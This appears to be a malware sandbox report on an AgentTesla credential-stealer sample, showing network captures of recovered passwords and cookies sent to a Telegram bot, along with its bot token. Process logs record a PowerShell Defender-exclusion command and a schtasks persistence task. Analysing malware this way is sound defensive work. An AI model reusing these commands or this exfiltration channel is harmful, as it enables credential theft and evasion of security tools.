                                                    Aug 5, 2022 12:24:10.994432926 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:11.000766993 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:11.000791073 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:11.001038074 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:11.059721947 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:11.595803976 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:11.622961998 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:11.625746965 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:11.667386055 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:11.726914883 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:11.727098942 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:11.727216005 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:11.728471994 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:15.063647032 CEST49785443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:15.063714027 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.063843012 CEST49785443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:15.064291000 CEST49785443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:15.064317942 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.123514891 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.128974915 CEST49785443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:15.129007101 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.182610989 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.186424017 CEST49785443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:15.186489105 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.343751907 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.343875885 CEST44349785149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:15.344340086 CEST49785443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:15.344724894 CEST49785443192.168.2.6149.154.167.220

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 5, 2022 12:24:10.806818008 CEST5002953192.168.2.68.8.8.8
                                                    Aug 5, 2022 12:24:10.823792934 CEST53500298.8.8.8192.168.2.6
                                                    Aug 5, 2022 12:24:15.043509960 CEST5119453192.168.2.68.8.8.8
                                                    Aug 5, 2022 12:24:15.062397003 CEST53511948.8.8.8192.168.2.6

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Aug 5, 2022 12:24:10.806818008 CEST192.168.2.68.8.8.80xb3e8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                    Aug 5, 2022 12:24:15.043509960 CEST192.168.2.68.8.8.80x5240Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Aug 5, 2022 12:24:10.823792934 CEST8.8.8.8192.168.2.60xb3e8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                    Aug 5, 2022 12:24:15.062397003 CEST8.8.8.8192.168.2.60x5240No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • api.telegram.org

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.649783149.154.167.220443C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    TimestampkBytes transferredDirectionData
                                                    2022-08-05 10:24:11 UTC0OUTPOST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary=---------------------------8da76e30dae4492
                                                    Host: api.telegram.org
                                                    Content-Length: 1019
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    2022-08-05 10:24:11 UTC0INHTTP/1.1 100 Continue
                                                    2022-08-05 10:24:11 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 65 33 30 64 61 65 34 34 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 34 32 38 33 35 35 32 35 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 65 33 30 64 61 65 34 34 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 33 39 30 31 32 30 0a 4f 53 46
                                                    Data Ascii: -----------------------------8da76e30dae4492Content-Disposition: form-data; name="chat_id"1428355250-----------------------------8da76e30dae4492Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/390120OSF
                                                    2022-08-05 10:24:11 UTC1INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 05 Aug 2022 10:24:11 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 595
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    {"ok":true,"result":{"message_id":833,"from":{"id":5589784704,"is_bot":true,"first_name":"7886754","username":"Citihubbot"},"chat":{"id":1428355250,"first_name":"CitiHub","type":"private"},"date":1659695051,"document":{"file_name":"user-390120 2022-08-05 01-04-27.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDQWLs78vr8FAf5fIGnNOR0OputL9MAAJIDQACNppgU0-zMNDgK5LbKQQ","file_unique_id":"AgADSA0AAjaaYFM","file_size":443},"caption":"New PW Recovered!\n\nUser Name: user/390120\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.649785149.154.167.220443C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    TimestampkBytes transferredDirectionData
                                                    2022-08-05 10:24:15 UTC2OUTPOST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary=---------------------------8da76e3c93cca40
                                                    Host: api.telegram.org
                                                    Content-Length: 1900
                                                    Expect: 100-continue
                                                    2022-08-05 10:24:15 UTC2INHTTP/1.1 100 Continue
                                                    2022-08-05 10:24:15 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 65 33 63 39 33 63 63 61 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 34 32 38 33 35 35 32 35 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 36 65 33 63 39 33 63 63 61 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 33 39 30 31 32 30
                                                    Data Ascii: -----------------------------8da76e3c93cca40Content-Disposition: form-data; name="chat_id"1428355250-----------------------------8da76e3c93cca40Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/390120
                                                    2022-08-05 10:24:15 UTC3OUTData Raw: 6a a0 f3 72 71 24 12 b3 9d 31 b4 dd dd ec b2 ef 68 8d c7 6c b3 64 e9 4c b5 f5 11 96 5f a1 66 47 6c 50 e9 db 39 28 d3 e8 a5 09 8b 51 77 8e 62 d4 9d 82 96 96 56 af 2f 94 0c 0b c4 28 ec 63 fb ed fb 73 4e b3 aa 56 e2 e6 42 5a ad 2e 05 35 5e 7d a8 1b 16 ea 43 c1 a0 30 de be b0 8a f2 8c 6b 6e f4 fc 61 fd b8 39 51 77 65 a4 06 94 de bb 93 e9 ae ed c9 9a 8e 55 bb 73 67 ba af 3f 99 de 4d ef 90 77 c7 e8 c5 61 a8 a9 de 12 f1 f8 42 89 e0 72 dd 72 5b 50 e3 ee d5 dd db 37 b8 eb 3b e0 44 51 3a 46 a4 1f a5 af 9c 1b 00 00 00 00 00 00 00 fc 2b 5d 2f 8a 89 c6 85 f3 1a dd cc 17 35 6e ec cd 31 b5 ec 1e ba 98 85 f8 8d d7 78 c4 70 e3 e5 d4 5a 41 6c 6e cc e7 b5 a2 6a 73 8d 97 ec d6 f8 2a e2 ee ff a7 88 34 25 fd 22 9d f9 a7 ff 0b 00 00 00 00 00 00 00 ac 28 2c 26 84 65 4e 01 c4 d5
                                                    Data Ascii: jrq$1hldL_fGlP9(QwbV/(csNVBZ.5^}C0kna9QweUsg?MwaBrr[P7;DQ:F+]/5n1xpZAlnjs*4%"(,&eN
                                                    2022-08-05 10:24:15 UTC4INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 05 Aug 2022 10:24:15 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 605
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    {"ok":true,"result":{"message_id":834,"from":{"id":5589784704,"is_bot":true,"first_name":"7886754","username":"Citihubbot"},"chat":{"id":1428355250,"first_name":"CitiHub","type":"private"},"date":1659695055,"document":{"file_name":"user-390120 2022-08-05 01-09-19.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIDQmLs78-kWdb69NohEB65REyeaQlxAAJJDQACNppgU7Pr6Et4DUP_KQQ","file_unique_id":"AgADSQ0AAjaaYFM","file_size":1315},"caption":"New Cookie Recovered!\n\nUser Name: user/390120\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:12:23:11
                                                    Start date:05/08/2022
                                                    Path:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\wKQpOZ58Gl.exe"
                                                    Imagebase:0x10000
                                                    File size:801280 bytes
                                                    MD5 hash:F7C9CF1410373A60A5C5A5E02AA4BD3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low

                                                    General

                                                    Target ID:5
                                                    Start time:12:23:35
                                                    Start date:05/08/2022
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                                                    Imagebase:0xf10000
                                                    File size:430592 bytes
                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    General

                                                    Target ID:6
                                                    Start time:12:23:35
                                                    Start date:05/08/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6406f0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:7
                                                    Start time:12:23:36
                                                    Start date:05/08/2022
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
                                                    Imagebase:0x30000
                                                    File size:185856 bytes
                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:9
                                                    Start time:12:23:37
                                                    Start date:05/08/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6406f0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:10
                                                    Start time:12:23:40
                                                    Start date:05/08/2022
                                                    Path:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    Imagebase:0x170000
                                                    File size:801280 bytes
                                                    MD5 hash:F7C9CF1410373A60A5C5A5E02AA4BD3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    General

                                                    Target ID:14
                                                    Start time:12:23:45
                                                    Start date:05/08/2022
                                                    Path:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    Imagebase:0x4a0000
                                                    File size:801280 bytes
                                                    MD5 hash:F7C9CF1410373A60A5C5A5E02AA4BD3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Disassembly

                                                    No disassembly